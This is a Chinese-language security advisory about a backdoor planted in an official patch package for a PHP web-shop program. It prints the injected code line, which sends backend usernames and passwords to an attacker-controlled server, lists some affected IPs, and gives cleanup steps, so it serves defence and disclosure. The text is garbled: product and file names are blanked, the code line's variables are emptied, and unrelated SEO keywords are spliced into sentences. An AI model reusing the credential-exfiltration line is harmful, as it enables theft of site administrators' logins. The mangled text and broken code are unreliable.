目前官方已經(jīng)在6月3日發(fā)布了新的補丁包

()，請及時檢查并修復(fù)。

網(wǎng)站安全中心在此提醒廣大站長，在為自己的網(wǎng)絡(luò)程序下載補丁文件時，務(wù)必進行相應(yīng)檢查。 即使補丁文件是從官網(wǎng)下載的，也有可能感染惡意后門。 使用本網(wǎng)店程序的站長可以登錄： #為自己的站點做一次安全檢查網(wǎng)站制作，平時登錄網(wǎng)站安全中心，第一時間了解自己網(wǎng)站的安全情況。

是很多站長喜歡使用的網(wǎng)店程序，其V2.7.3版本擁有眾多用戶。

2013年5月seo優(yōu)化，網(wǎng)站安全中心曾響應(yīng)網(wǎng)店程序后門事件。 我以為事情已經(jīng)結(jié)束了。 沒想到近日，又有安全研究員在漏洞平臺上發(fā)現(xiàn)了官方補丁的后門代碼。

網(wǎng)站安全研究人員分析發(fā)現(xiàn)，本次后門代碼存在于編號為.的歷史補丁文件包中。 黑客篡改補丁包中的(\\.php)文件后，插入一段記錄后臺用戶和密碼信息的代碼，發(fā)送到黑客控制的服務(wù)器上。 值得注意的是php 開源網(wǎng)店系統(tǒng)，安全研究人員并未在前兩次補丁的后門代碼中發(fā)現(xiàn)該后門代碼，因此本次后門事件可能發(fā)生在前兩次篡改之前。

該黑客植入的后門代碼：

文件 \\.php 代碼行 113-114：

@('http://[馬賽

g]/api///w2.php?='.$[''].'&='.$[''].'---'.$[''].'---'.date ('Ymd|H:i:s').'---'.$[''].$['']);

通過進一步分析發(fā)現(xiàn)，“[]/”網(wǎng)站實際上是一個被黑客控制的網(wǎng)站（“肉雞”），黑客用來收集密碼等信息的文件目錄也可以“遍歷文件”，如如圖所示：

經(jīng)過網(wǎng)站安全研究人員下載和去重后，發(fā)現(xiàn)約有90個域名網(wǎng)站受到影響。 名單如下：

.cn

121.11.65.175:8085

117.34.74.168

網(wǎng)站安全研究中心推薦的解決方案：

1、使用的站長朋友，查看上面公布的域名php 開源網(wǎng)店系統(tǒng)，查看\\.php文件內(nèi)容，搜索關(guān)鍵詞“w2.php”。 如果您發(fā)現(xiàn)上述惡意代碼，請直接刪除并保存。

2、修改所有后臺權(quán)限用戶的密碼，并通知本站所有用戶修改密碼。

3. 查看網(wǎng)站和服務(wù)器的安全狀態(tài)。